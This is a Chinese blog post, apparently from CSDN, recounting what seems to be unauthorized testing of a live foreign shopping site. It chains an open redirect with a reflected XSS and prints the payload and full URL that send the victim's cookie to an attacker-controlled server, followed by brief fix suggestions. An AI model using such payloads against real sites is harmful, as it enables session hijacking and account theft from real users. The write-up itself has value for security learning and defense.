我的第一次真实对国外某购物平台web漏洞挖掘

(真实世界)我的第一次真实对国外某购物平台web漏洞挖掘

  • 开放重定向 - 低危
  • XSS - 低危

这两组合起来就完全不一样一点的,个人觉得比原本高一些

危害:窃取用户敏感数据、用户cookie、钓鱼操作 等…

前言

这是我第一次,真实世界的web漏洞挖掘(开发重定向 + xss)

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单
虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单
虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

这次漏洞挖掘是无意的,这是我在做题的时候,题目需要我进行信息收集,我收集到相关的一个网站,于是在这个网站多看了几眼,发现了漏洞


首先我打开这个网站的第一件事,也是最简单的:查看源代码

在这里插入图片描述

源代码:

在这里插入图片描述

在源代码中发现这一个url


url参数重定向 - OpenRedirect

分析:

/sign-in?redirect=

这里我测试过,因为这里是用户登录页面

  • 如果用户未登录,则在用户登录成功后,重定向到redirect参数指定的url
  • 如果用户已登录,则直接跳转到redirect参数指定的url

当我尝试修改redirect参数,改成百度:

在这里插入图片描述

在已登录状态下,确实重定向到百度去了


open redirect的好兄弟

我们都知道,单单一个开放重定向通常情况下危害不大,甚至可以忽略不计,没啥用

但是可以搭配其他漏洞来做一套组合拳,这个漏洞就是xss.

通过开放重定向漏洞将受害者重定向到被攻击者控制的具有xss漏洞的页面上,执行恶意js代码

通过这套开放重定向 + xss

攻击者很容易获得一些信息,如:

  • 用户的cookie
  • 攻击者期望的操作,例如:下单、修改账户等相关操作
  • 社会工程 - 攻击者利用xss构建恶意代码,攻击者诱导受害者填写隐私信息以获取攻击者想要获取的受害者的信息

等等等等


所以现在我们的当务之急应该寻找xss漏洞,打一套组合拳

XSS - 反射型

果不其然,经过tryhackme的训练,我一下子就找到了

就在网站主页的搜索功能

一开始尝试sql注入,但是无果

但是第二次尝试寻找漏洞的时候,我发现输入的内容会拼接到回显页面中,于是开始尝试xss

在这里插入图片描述

它直接镶嵌到span标签中

我直接绕出去了,毫无难度,成功找到反射xss漏洞


XSS + OpenRedirect - 组合拳

兔年万事如意,心想事成

现在我们可以尝试简单的利用xss+开放重定向获取用户的cookie

构造XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

注意:这里的fetch函数中的url不能携带有http://或https://,否则会失败,所以使用//

最好不要有空格,因为此payload稍后将会放到url参数中


我们可以直接验证此payload是否有效:

在这里插入图片描述

可以看到它携带着cookie去请求攻击者托管的http服务器去了!

在这里插入图片描述

现在让我们将xss和开放重定向组合起来:

实现让用户点击我们的精心设计过的登录url,即可窃取该用户的cookie等

如果通过钓鱼等方式令网站管理员点击此恶意链接会发生什么事?

我很难想象,毕竟这个平台有些地方甚至没有csrf防护,也别忘了我们还有xss

回归正题

首先,随便注册个账户并登录

在这里插入图片描述

XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

OpenRedirect Payload:

https://www.nonno.co.uk/sign-in?redirect=https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

解析:当已登录用户点击此OpenRedirect payload的url,将重定向到xss漏洞处并执行我们指定的恶意js代码,这里的js代码使用fetch发送请求到我们攻击者的http服务器并附带cookie

在这里插入图片描述

至此漏洞利用完成,攻击者将获取受害者的cookie,甚至其他任何操作!

只要适当的将payload进行urlencode,受害者可能根本无法判断!

更进一步的利用:OpenRedirect + XSS,再加csrf等等等等,危害还能在提升


漏洞修补建议

OpenRedirect

  • 不要使用url参数(GET or POST)来进行重定向,即便使用,也要做好防护,避免idor
  • 完善各个功能的csrf防护

XSS

  • 做好用户输入检测,检测到黑名单字符直接禁止访问
  • 过滤特殊字符

结束

事实上我这里只找了两个漏洞,很难猜测其他地方是否还存在其他漏洞。

希望平台管理方认真做好安全防护

这也是我的第一次真实的web漏洞挖掘,我非常的激动,这是一次无意的漏洞挖掘,真的是无意的


不说了,跑路了

  • 30
    点赞
  • 62
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 11
    评论
推荐,网络安全中的漏洞挖掘实践合集,仅供大家学习参阅,包含内容如下: 针对现实应用的文本对抗攻击研究 安全众测下的漏洞发展新趋势 安卓应用漏洞挖掘 从0到1-发现与拓展攻击面 对基于Git的版本控制服务的通用攻击面的探索 对民用飞行控制系统固件的逆向与漏洞分析 卫星通信的安全缺陷 基于全流量的智慧漏洞挖掘 基于运行时类型嗅探技术提高模糊测试的漏洞发掘效果 漏洞挖掘进化论-推开xray之门 逆向在漏洞挖掘中的应用 苹果攻击面和漏洞挖掘自动化研究 如何从高赏金项目中拿到高危 如何去挖掘物联网环境中的高级恶意软件威胁 如何在3个月发现 12 个内核信息泄露漏洞 沙箱内持久化.行之有效的沙箱攻击新思路 深度解析Weblogic_XMLDecoder反序列化 使用数据流敏感模糊测试发现漏洞 锁不住的安全 谈谈工业协议转换器的一些问题 逃逸IE浏览器沙箱-在野0Day漏洞利用复现 为何自动化漏洞挖掘如此困难 现代可抵赖后门研究 一扇虚掩的大门-现代智能系统的重要攻击面 源代码漏洞挖掘 远程root现代安卓设备 在现代Windows内核中发现存在20年的漏洞 针对智能设备漏洞挖掘的一些新方法 AI用于软件漏洞挖掘 AndroidWebView安全攻防指南2020 Java反序列化漏洞自动挖掘方法 macOS从运行库劫持到内核提权 MTK安全启动大剖析.CIS大会分论 MyBatis框架下SQL注入解决方案 Qemu-kvm和ESXi虚拟机逃逸实例分享 WEB常见漏洞与挖掘技巧研究 Web漏洞挖掘速成特训营 混合式漏洞挖掘研究进展
Web漏洞挖掘是一项重要的安全工作,可以帮助发现和修复Web应用程序中存在的潜在漏洞。以下是一些实战中常用的Web漏洞挖掘方法: 1. 信息收集:收集关于目标应用程序的信息,包括架构、技术栈、可用端点等。 2. 扫描和映射:使用自动化工具(如Burp Suite、Nessus)扫描目标应用程序,识别潜在的漏洞点,并进行应用程序映射。 3. 注入攻击:通过输入恶意数据,检查应用程序是否容易受到SQL注入、命令注入或其他注入类攻击。 4. 跨站脚本攻击(XSS):尝试在用户输入点或其他可注入脚本的位置插入恶意脚本,以执行未经授权的操作。 5. 跨站请求伪造(CSRF):检查应用程序是否存在缺乏适当身份验证和授权机制,以防止来自恶意网站的伪造请求。 6. 文件包含漏洞:检查应用程序是否存在可用于包含远程文件的漏洞,从而可能导致代码执行或敏感信息泄露。 7. 不安全的直接对象引用(IDOR):尝试直接访问应用程序中的资源,绕过身份验证和授权检查,查看是否存在未受保护的敏感信息。 8. 服务器配置错误:检查目标服务器的配置文件,查看是否存在敏感信息泄露、目录列表、不安全的HTTP方法等问题。 9. 逻辑漏洞:检查应用程序的业务逻辑,寻找可能导致未经授权的访问或敏感信息泄露的逻辑错误。 10. 漏洞利用和验证:对发现的漏洞进行进一步测试和验证,并编写详细的报告,以便开发人员能够修复这些漏洞。 请注意,进行Web漏洞挖掘需要合法授权和合规性,任何未经授权的活动都是违法的。建议在进行漏洞挖掘之前,与相关业主或法定所有者协商和获得明确的许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值